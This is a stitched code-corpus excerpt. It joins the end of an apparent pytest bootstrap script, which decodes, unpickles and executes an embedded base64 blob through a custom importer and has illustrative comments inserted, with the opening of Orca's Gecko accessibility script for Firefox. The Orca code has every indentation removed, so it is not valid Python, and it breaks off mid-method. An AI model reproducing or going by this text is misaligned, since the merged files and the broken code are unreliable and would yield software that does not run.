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
"""
import sys
import base64
import zlib
class DictImporter(object):
    def __init__(self, sources):
        self.sources = sources

    def find_module(self, fullname, path=None):
        if fullname == "argparse" and sys.version_info >= (2,7):
            # we were generated with <python2.7 (which pulls in argparse)
            # but we are running now on a stdlib which has it, so use that.
            return None
        if fullname in self.sources:
            return self
        if fullname + '.__init__' in self.sources:
            return self
        return None

    def load_module(self, fullname):
        # print "load_module:", fullname
        from types import ModuleType
        try:
            s = self.sources[fullname]
            is_pkg = False
        except KeyError:
            s = self.sources[fullname + '.__init__']
            is_pkg = True
        co = compile(s, fullname, 'exec')
        module = sys.modules.setdefault(fullname, ModuleType(fullname))
        module.__file__ = "%s/%s" % (__file__, fullname)
        module.__loader__ = self
        if is_pkg:
            module.__path__ = [fullname]
        do_exec(co, module.__dict__)  # noqa
        return sys.modules[fullname]

    def get_source(self, name):
        res = self.sources.get(name)
        if res is None:
            res = self.sources.get(name + '.__init__')
        return res
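
# A minimal usage sketch (added for illustration; not part of the original
# bootstrap). It shows how a DictImporter serves both plain modules and
# packages from an in-memory {name: source} mapping, on Pythons where the
# legacy find_module/load_module meta-path protocol is still honored
# (it was removed in 3.12). The names "demo_sources" and "demo_pkg" are
# hypothetical, and do_exec() is supplied locally because the real one is
# only defined in the __main__ block below.
#
#     def do_exec(co, loc):
#         exec(co, loc)
#
#     demo_sources = {
#         "demo_pkg.__init__": "VALUE = 42\n",
#         "demo_pkg.util": "def double(x):\n    return 2 * x\n",
#     }
#     sys.meta_path.insert(0, DictImporter(demo_sources))
#     import demo_pkg                 # resolved via "demo_pkg.__init__"
#     from demo_pkg import util      # resolved via "demo_pkg.util"
#     assert demo_pkg.VALUE == 42 and util.double(21) == 42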
if __name__ == "__main__":
    if sys.version_info >= (3, 0):
        exec("def do_exec(co, loc): exec(co, loc)\n")
        import pickle
        sources = sources.encode("ascii")  # ensure bytes
        sources = pickle.loads(zlib.decompress(base64.decodebytes(sources)))
    else:
        import cPickle as pickle
        exec("def do_exec(co, loc): exec co in loc\n")
        sources = pickle.loads(zlib.decompress(base64.decodestring(sources)))

    importer = DictImporter(sources)
    sys.meta_path.insert(0, importer)
    entry = "import pytest; raise SystemExit(pytest.cmdline.main())"
    do_exec(entry, locals())  # noqa
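
# For reference, a sketch (an assumption; the generator script is not part
# of this file) of how a "sources" blob like the one above could be
# produced. It simply runs the decode chain used in __main__ in reverse:
# pickle the {module name: source} dict, zlib-compress it, then
# base64-encode it.
#
#     import base64, pickle, zlib
#     blob = base64.encodebytes(
#         zlib.compress(pickle.dumps({"demo": "print('hi')\n"}, protocol=2))
#     ).decode("ascii")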
| dmargala/tpcorr | runtests.py | Python | mit | 236,863 | ["Elk"] | b1dde6cfd35b8be1183cf1cf35efaa310e6f4ce3ed33dfb881c3fba1f0ab7d04 |
# Orca
#
# Copyright 2005-2009 Sun Microsystems Inc.
# Copyright 2010 Orca Team.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor,
# Boston, MA 02110-1301 USA.
# [[[TODO: WDW - Pylint is giving us a bunch of errors along these
# lines throughout this file:
#
# E1103:4241:Script.updateBraille: Instance of 'list' has no 'getRole'
# member (but some types could not be inferred)
#
# I don't know what is going on, so I'm going to tell pylint to
# disable those messages for Gecko.py.]]]
#
# pylint: disable-msg=E1103
"""Custom script for Gecko toolkit.
Please refer to the following URL for more information on the AT-SPI
implementation in Gecko:
http://developer.mozilla.org/en/docs/Accessibility/ATSPI_Support
"""
__id__ = "$Id$"
__version__ = "$Revision$"
__date__ = "$Date$"
__copyright__ = "Copyright (c) 2010 Orca Team."
__license__ = "LGPL"
from gi.repository import Gtk
import pyatspi
import time
import urllib.parse
import orca.braille as braille
import orca.cmdnames as cmdnames
import orca.debug as debug
import orca.scripts.default as default
import orca.eventsynthesizer as eventsynthesizer
import orca.guilabels as guilabels
import orca.input_event as input_event
import orca.keybindings as keybindings
import orca.liveregions as liveregions
import orca.messages as messages
import orca.object_properties as object_properties
import orca.orca as orca
import orca.orca_state as orca_state
import orca.settings as settings
import orca.settings_manager as settings_manager
import orca.speech as speech
import orca.speechserver as speechserver
from . import keymaps
from . import script_settings
from .braille_generator import BrailleGenerator
from .speech_generator import SpeechGenerator
from .formatting import Formatting
from .bookmarks import GeckoBookmarks
from .structural_navigation import GeckoStructuralNavigation
from .script_utilities import Utilities
from orca.orca_i18n import _
from orca.speech_generator import Pause
from orca.acss import ACSS
_settingsManager = settings_manager.getManager()
########################################################################
# #
# Script #
# #
########################################################################
class Script(default.Script):
"""The script for Firefox."""
####################################################################
# #
# Overridden Script Methods #
# #
####################################################################
def __init__(self, app):
default.Script.__init__(self, app)
# Initialize variables to make pylint happy.
#
self.arrowToLineBeginningCheckButton = None
self.changedLinesOnlyCheckButton = None
self.controlCaretNavigationCheckButton = None
self.minimumFindLengthAdjustment = None
self.minimumFindLengthLabel = None
self.minimumFindLengthSpinButton = None
self.sayAllOnLoadCheckButton = None
self.skipBlankCellsCheckButton = None
self.speakCellCoordinatesCheckButton = None
self.speakCellHeadersCheckButton = None
self.speakCellSpanCheckButton = None
self.speakResultsDuringFindCheckButton = None
self.structuralNavigationCheckButton = None
# _caretNavigationFunctions are functions that represent fundamental
# ways to move the caret (e.g., by the arrow keys).
#
self._caretNavigationFunctions = \
[Script.goNextCharacter,
Script.goPreviousCharacter,
Script.goNextWord,
Script.goPreviousWord,
Script.goNextLine,
Script.goPreviousLine,
Script.expandComboBox,
Script.goTopOfFile,
Script.goBottomOfFile,
Script.goBeginningOfLine,
Script.goEndOfLine]
self._liveRegionFunctions = \
[Script.setLivePolitenessOff,
Script.advanceLivePoliteness,
Script.monitorLiveRegions,
Script.reviewLiveAnnouncement]
if script_settings.controlCaretNavigation:
debug.println(debug.LEVEL_CONFIGURATION,
"Orca is controlling the caret.")
else:
debug.println(debug.LEVEL_CONFIGURATION,
"Gecko is controlling the caret.")
# We keep track of whether we're currently in the process of
# loading a page.
#
self._loadingDocumentContent = False
self._loadingDocumentTime = 0.0
# In tabbed content (i.e., Firefox's support for one tab per
# URL), we also keep track of the caret context in each tab.
# The key is the document frame and the value is the caret
# context for that frame.
#
self._documentFrameCaretContext = {}
# During a find we get caret-moved events reflecting the changing
# screen contents. The user can opt to have these changes announced.
# If the announcement is enabled, it will still only be made if the
# selected text is a certain length (user-configurable) and if the
# line has changed (so we don't keep repeating the line). However,
# the line has almost certainly changed prior to this length being
# reached. Therefore, we need to make an initial announcement, which
# means we need to know if that has already taken place.
#
self.madeFindAnnouncement = False
# We don't want to prevent the user from arrowing into an
# autocomplete when it appears in a search form. We need to
# keep track of whether one has appeared or disappeared.
#
self._autocompleteVisible = False
# Create the live region manager and start the message manager
self.liveMngr = liveregions.LiveRegionManager(self)
# We want to keep track of the line contents we just got so that
# we can speak and braille this information without having to call
# getLineContentsAtOffset() twice.
#
self._previousLineContents = None
self.currentLineContents = None
self._nextLineContents = None
# For really large objects, a call to getAttributes can take up to
# two seconds! This is a Firefox bug. We'll try to improve things
# by storing attributes.
#
self.currentAttrs = {}
# Last focused frame. We are only interested in frame focused events
# when it is a different frame, so here we store the last frame
# that received state-changed:focused.
#
self._currentFrame = None
# A dictionary of Gecko-style attribute names and their equivalent/
# expected names. This is necessary so that we can present the
# attributes to the user in a consistent fashion across apps and
# toolkits. Note that underlinesolid and line-throughsolid are
# temporary fixes: text_attribute_names.py assumes a one-to-one
# correspondence. This is not a problem when going from attribute
# name to localized name; in the reverse direction, we need more
# context (i.e. we can't safely make them both be "solid"). A
# similar issue exists with "start" which means no justification
# has explicitly been set. If we set that to "none", "none" will
# no longer have a single reverse translation.
#
self.attributeNamesDict = {
"font-weight" : "weight",
"font-family" : "family-name",
"font-style" : "style",
"text-align" : "justification",
"text-indent" : "indent",
"font-size" : "size",
"background-color" : "bg-color",
"color" : "fg-color",
"text-line-through-style" : "strikethrough",
"text-underline-style" : "underline",
"text-position" : "vertical-align",
"writing-mode" : "direction",
"-moz-left" : "left",
"-moz-right" : "right",
"-moz-center" : "center",
"start" : "no justification",
"underlinesolid" : "single",
"line-throughsolid" : "solid"}
# Keep track of the last object which appeared as a result of
# the user routing the mouse pointer over an object. Also keep
# track of the object which is associated with the mouse over
# so that we can restore focus to it if need be.
#
self.lastMouseOverObject = None
self.preMouseOverContext = [None, -1]
self.inMouseOverObject = False
# See bug 665522 - comment 5
app.setCacheMask(pyatspi.cache.DEFAULT ^ pyatspi.cache.CHILDREN)
def getBookmarks(self):
"""Returns the "bookmarks" class for this script.
"""
try:
return self.bookmarks
except AttributeError:
self.bookmarks = GeckoBookmarks(self)
return self.bookmarks
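# Note: getBookmarks() lazily creates the GeckoBookmarks instance on first
# use and caches it on self.bookmarks, so every later call returns the same
# object.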
def getBrailleGenerator(self):
"""Returns the braille generator for this script.
"""
return BrailleGenerator(self)
def getSpeechGenerator(self):
"""Returns the speech generator for this script.
"""
return SpeechGenerator(self)
def getFormatting(self):
"""Returns the formatting strings for this script."""
return Formatting(self)
def getUtilities(self):
"""Returns the utilites for this script."""
return Utilities(self)
def getEnabledStructuralNavigationTypes(self):
"""Returns a list of the structural navigation object types
enabled in this script.
"""
enabledTypes = [GeckoStructuralNavigation.ANCHOR,
GeckoStructuralNavigation.BLOCKQUOTE,
GeckoStructuralNavigation.BUTTON,
GeckoStructuralNavigation.CHECK_BOX,
GeckoStructuralNavigation.CHUNK,
GeckoStructuralNavigation.COMBO_BOX,
GeckoStructuralNavigation.ENTRY,
GeckoStructuralNavigation.FORM_FIELD,
GeckoStructuralNavigation.HEADING,
GeckoStructuralNavigation.LANDMARK,
GeckoStructuralNavigation.LINK,
GeckoStructuralNavigation.LIST,
GeckoStructuralNavigation.LIST_ITEM,
GeckoStructuralNavigation.LIVE_REGION,
GeckoStructuralNavigation.PARAGRAPH,
GeckoStructuralNavigation.RADIO_BUTTON,
GeckoStructuralNavigation.SEPARATOR,
GeckoStructuralNavigation.TABLE,
GeckoStructuralNavigation.TABLE_CELL,
GeckoStructuralNavigation.UNVISITED_LINK,
GeckoStructuralNavigation.VISITED_LINK]
return enabledTypes
def getStructuralNavigation(self):
"""Returns the 'structural navigation' class for this script.
"""
types = self.getEnabledStructuralNavigationTypes()
enable = script_settings.structuralNavigationEnabled
return GeckoStructuralNavigation(self, types, enable)
def setupInputEventHandlers(self):
"""Defines InputEventHandler fields for this script that can be
called by the key and braille bindings.
"""
default.Script.setupInputEventHandlers(self)
self.inputEventHandlers.update(\
self.structuralNavigation.inputEventHandlers)
self.inputEventHandlers["goNextCharacterHandler"] = \
input_event.InputEventHandler(
Script.goNextCharacter,
cmdnames.CARET_NAVIGATION_NEXT_CHAR)
self.inputEventHandlers["goPreviousCharacterHandler"] = \
input_event.InputEventHandler(
Script.goPreviousCharacter,
cmdnames.CARET_NAVIGATION_PREV_CHAR)
self.inputEventHandlers["goNextWordHandler"] = \
input_event.InputEventHandler(
Script.goNextWord,
cmdnames.CARET_NAVIGATION_NEXT_WORD)
self.inputEventHandlers["goPreviousWordHandler"] = \
input_event.InputEventHandler(
Script.goPreviousWord,
cmdnames.CARET_NAVIGATION_PREV_WORD)
self.inputEventHandlers["goNextLineHandler"] = \
input_event.InputEventHandler(
Script.goNextLine,
cmdnames.CARET_NAVIGATION_NEXT_LINE)
self.inputEventHandlers["goPreviousLineHandler"] = \
input_event.InputEventHandler(
Script.goPreviousLine,
cmdnames.CARET_NAVIGATION_PREV_LINE)
self.inputEventHandlers["goTopOfFileHandler"] = \
input_event.InputEventHandler(
Script.goTopOfFile,
cmdnames.CARET_NAVIGATION_FILE_START)
self.inputEventHandlers["goBottomOfFileHandler"] = \
input_event.InputEventHandler(
Script.goBottomOfFile,
cmdnames.CARET_NAVIGATION_FILE_END)
self.inputEventHandlers["goBeginningOfLineHandler"] = \
input_event.InputEventHandler(
Script.goBeginningOfLine,
cmdnames.CARET_NAVIGATION_LINE_START)
self.inputEventHandlers["goEndOfLineHandler"] = \
input_event.InputEventHandler(
Script.goEndOfLine,
cmdnames.CARET_NAVIGATION_LINE_END)
self.inputEventHandlers["expandComboBoxHandler"] = \
input_event.InputEventHandler(
Script.expandComboBox,
cmdnames.CARET_NAVIGATION_EXPAND_COMBO_BOX)
self.inputEventHandlers["advanceLivePoliteness"] = \
input_event.InputEventHandler(
Script.advanceLivePoliteness,
cmdnames.LIVE_REGIONS_ADVANCE_POLITENESS)
self.inputEventHandlers["setLivePolitenessOff"] = \
input_event.InputEventHandler(
Script.setLivePolitenessOff,
cmdnames.LIVE_REGIONS_SET_POLITENESS_OFF)
self.inputEventHandlers["monitorLiveRegions"] = \
input_event.InputEventHandler(
Script.monitorLiveRegions,
cmdnames.LIVE_REGIONS_MONITOR)
self.inputEventHandlers["reviewLiveAnnouncement"] = \
input_event.InputEventHandler(
Script.reviewLiveAnnouncement,
cmdnames.LIVE_REGIONS_REVIEW)
self.inputEventHandlers["goPreviousObjectInOrderHandler"] = \
input_event.InputEventHandler(
Script.goPreviousObjectInOrder,
cmdnames.CARET_NAVIGATION_PREV_OBJECT)
self.inputEventHandlers["goNextObjectInOrderHandler"] = \
input_event.InputEventHandler(
Script.goNextObjectInOrder,
cmdnames.CARET_NAVIGATION_NEXT_OBJECT)
self.inputEventHandlers["toggleCaretNavigationHandler"] = \
input_event.InputEventHandler(
Script.toggleCaretNavigation,
cmdnames.CARET_NAVIGATION_TOGGLE)
self.inputEventHandlers["sayAllHandler"] = \
input_event.InputEventHandler(
Script.sayAll,
cmdnames.SAY_ALL)
self.inputEventHandlers["panBrailleLeftHandler"] = \
input_event.InputEventHandler(
Script.panBrailleLeft,
cmdnames.PAN_BRAILLE_LEFT,
False) # Do not enable learn mode for this action
self.inputEventHandlers["panBrailleRightHandler"] = \
input_event.InputEventHandler(
Script.panBrailleRight,
cmdnames.PAN_BRAILLE_RIGHT,
False) # Do not enable learn mode for this action
self.inputEventHandlers["moveToMouseOverHandler"] = \
input_event.InputEventHandler(
Script.moveToMouseOver,
cmdnames.MOUSE_OVER_MOVE)
def __getArrowBindings(self):
"""Returns an instance of keybindings.KeyBindings that use the
arrow keys for navigating HTML content.
"""
keyBindings = keybindings.KeyBindings()
keyBindings.load(keymaps.arrowKeymap, self.inputEventHandlers)
return keyBindings
def getToolkitKeyBindings(self):
"""Returns the toolkit-specific keybindings for this script."""
keyBindings = keybindings.KeyBindings()
keyBindings.load(keymaps.commonKeymap, self.inputEventHandlers)
if _settingsManager.getSetting('keyboardLayout') == \
orca.settings.GENERAL_KEYBOARD_LAYOUT_DESKTOP:
keyBindings.load(keymaps.desktopKeymap, self.inputEventHandlers)
else:
keyBindings.load(keymaps.laptopKeymap, self.inputEventHandlers)
if script_settings.controlCaretNavigation:
for keyBinding in self.__getArrowBindings().keyBindings:
keyBindings.add(keyBinding)
bindings = self.structuralNavigation.keyBindings
for keyBinding in bindings.keyBindings:
keyBindings.add(keyBinding)
return keyBindings
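# Note: the bindings above are layered in order -- the common keymap, then the
# desktop or laptop keymap, then (when Orca controls the caret) the arrow-key
# bindings, and finally the structural navigation bindings -- so later
# additions extend rather than replace the common set.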
def getAppPreferencesGUI(self):
"""Return a GtkGrid containing the application unique configuration
GUI items for the current application."""
grid = Gtk.Grid()
grid.set_border_width(12)
generalFrame = Gtk.Frame()
grid.attach(generalFrame, 0, 0, 1, 1)
label = Gtk.Label(label="<b>%s</b>" % guilabels.PAGE_NAVIGATION)
label.set_use_markup(True)
generalFrame.set_label_widget(label)
generalAlignment = Gtk.Alignment.new(0.5, 0.5, 1, 1)
generalAlignment.set_padding(0, 0, 12, 0)
generalFrame.add(generalAlignment)
generalGrid = Gtk.Grid()
generalAlignment.add(generalGrid)
label = guilabels.USE_CARET_NAVIGATION
value = script_settings.controlCaretNavigation
self.controlCaretNavigationCheckButton = \
Gtk.CheckButton.new_with_mnemonic(label)
self.controlCaretNavigationCheckButton.set_active(value)
generalGrid.attach(self.controlCaretNavigationCheckButton, 0, 0, 1, 1)
label = guilabels.USE_STRUCTURAL_NAVIGATION
value = self.structuralNavigation.enabled
self.structuralNavigationCheckButton = \
Gtk.CheckButton.new_with_mnemonic(label)
self.structuralNavigationCheckButton.set_active(value)
generalGrid.attach(self.structuralNavigationCheckButton, 0, 1, 1, 1)
label = guilabels.CARET_NAVIGATION_START_OF_LINE
value = script_settings.arrowToLineBeginning
self.arrowToLineBeginningCheckButton = \
Gtk.CheckButton.new_with_mnemonic(label)
self.arrowToLineBeginningCheckButton.set_active(value)
generalGrid.attach(self.arrowToLineBeginningCheckButton, 0, 3, 1, 1)
label = guilabels.READ_PAGE_UPON_LOAD
value = script_settings.sayAllOnLoad
self.sayAllOnLoadCheckButton = Gtk.CheckButton.new_with_mnemonic(label)
self.sayAllOnLoadCheckButton.set_active(value)
generalGrid.attach(self.sayAllOnLoadCheckButton, 0, 4, 1, 1)
tableFrame = Gtk.Frame()
grid.attach(tableFrame, 0, 1, 1, 1)
label = Gtk.Label(label="<b>%s</b>" % guilabels.TABLE_NAVIGATION)
label.set_use_markup(True)
tableFrame.set_label_widget(label)
tableAlignment = Gtk.Alignment.new(0.5, 0.5, 1, 1)
tableAlignment.set_padding(0, 0, 12, 0)
tableFrame.add(tableAlignment)
tableGrid = Gtk.Grid()
tableAlignment.add(tableGrid)
label = guilabels.TABLE_SPEAK_CELL_COORDINATES
value = _settingsManager.getSetting('speakCellCoordinates')
self.speakCellCoordinatesCheckButton = \
Gtk.CheckButton.new_with_mnemonic(label)
self.speakCellCoordinatesCheckButton.set_active(value)
tableGrid.attach(self.speakCellCoordinatesCheckButton, 0, 0, 1, 1)
label = guilabels.TABLE_SPEAK_CELL_SPANS
value = _settingsManager.getSetting('speakCellSpan')
self.speakCellSpanCheckButton = \
Gtk.CheckButton.new_with_mnemonic(label)
self.speakCellSpanCheckButton.set_active(value)
tableGrid.attach(self.speakCellSpanCheckButton, 0, 1, 1, 1)
label = guilabels.TABLE_ANNOUNCE_CELL_HEADER
value = _settingsManager.getSetting('speakCellHeaders')
self.speakCellHeadersCheckButton = \
Gtk.CheckButton.new_with_mnemonic(label)
self.speakCellHeadersCheckButton.set_active(value)
tableGrid.attach(self.speakCellHeadersCheckButton, 0, 2, 1, 1)
label = guilabels.TABLE_SKIP_BLANK_CELLS
value = _settingsManager.getSetting('skipBlankCells')
self.skipBlankCellsCheckButton = \
Gtk.CheckButton.new_with_mnemonic(label)
self.skipBlankCellsCheckButton.set_active(value)
tableGrid.attach(self.skipBlankCellsCheckButton, 0, 3, 1, 1)
findFrame = Gtk.Frame()
grid.attach(findFrame, 0, 2, 1, 1)
label = Gtk.Label(label="<b>%s</b>" % guilabels.FIND_OPTIONS)
label.set_use_markup(True)
findFrame.set_label_widget(label)
findAlignment = Gtk.Alignment.new(0.5, 0.5, 1, 1)
findAlignment.set_padding(0, 0, 12, 0)
findFrame.add(findAlignment)
findGrid = Gtk.Grid()
findAlignment.add(findGrid)
label = guilabels.FIND_SPEAK_RESULTS
value = script_settings.speakResultsDuringFind
self.speakResultsDuringFindCheckButton = \
Gtk.CheckButton.new_with_mnemonic(label)
self.speakResultsDuringFindCheckButton.set_active(value)
findGrid.attach(self.speakResultsDuringFindCheckButton, 0, 0, 1, 1)
label = guilabels.FIND_ONLY_SPEAK_CHANGED_LINES
value = script_settings.onlySpeakChangedLinesDuringFind
self.changedLinesOnlyCheckButton = \
Gtk.CheckButton.new_with_mnemonic(label)
self.changedLinesOnlyCheckButton.set_active(value)
findGrid.attach(self.changedLinesOnlyCheckButton, 0, 1, 1, 1)
hgrid = Gtk.Grid()
findGrid.attach(hgrid, 0, 2, 1, 1)
self.minimumFindLengthLabel = \
Gtk.Label(label=guilabels.FIND_MINIMUM_MATCH_LENGTH)
self.minimumFindLengthLabel.set_alignment(0, 0.5)
hgrid.attach(self.minimumFindLengthLabel, 0, 0, 1, 1)
self.minimumFindLengthAdjustment = \
Gtk.Adjustment(script_settings.minimumFindLength, 0, 20, 1)
self.minimumFindLengthSpinButton = Gtk.SpinButton()
self.minimumFindLengthSpinButton.set_adjustment(
self.minimumFindLengthAdjustment)
hgrid.attach(self.minimumFindLengthSpinButton, 1, 0, 1, 1)
self.minimumFindLengthLabel.set_mnemonic_widget(
self.minimumFindLengthSpinButton)
grid.show_all()
return grid
def setAppPreferences(self, prefs):
"""Write out the application specific preferences lines and set the
new values.
Arguments:
- prefs: file handle for application preferences.
"""
prefs.writelines("\n")
prefix = "orca.scripts.toolkits.Gecko.script_settings"
prefs.writelines("import %s\n\n" % prefix)
value = self.controlCaretNavigationCheckButton.get_active()
prefs.writelines("%s.controlCaretNavigation = %s\n" % (prefix, value))
script_settings.controlCaretNavigation = value
value = self.structuralNavigationCheckButton.get_active()
prefs.writelines("%s.structuralNavigationEnabled = %s\n" \
% (prefix, value))
script_settings.structuralNavigationEnabled = value
value = self.arrowToLineBeginningCheckButton.get_active()
prefs.writelines("%s.arrowToLineBeginning = %s\n" % (prefix, value))
script_settings.arrowToLineBeginning = value
value = self.sayAllOnLoadCheckButton.get_active()
prefs.writelines("%s.sayAllOnLoad = %s\n" % (prefix, value))
script_settings.sayAllOnLoad = value
value = self.speakResultsDuringFindCheckButton.get_active()
prefs.writelines("%s.speakResultsDuringFind = %s\n" % (prefix, value))
script_settings.speakResultsDuringFind = value
value = self.changedLinesOnlyCheckButton.get_active()
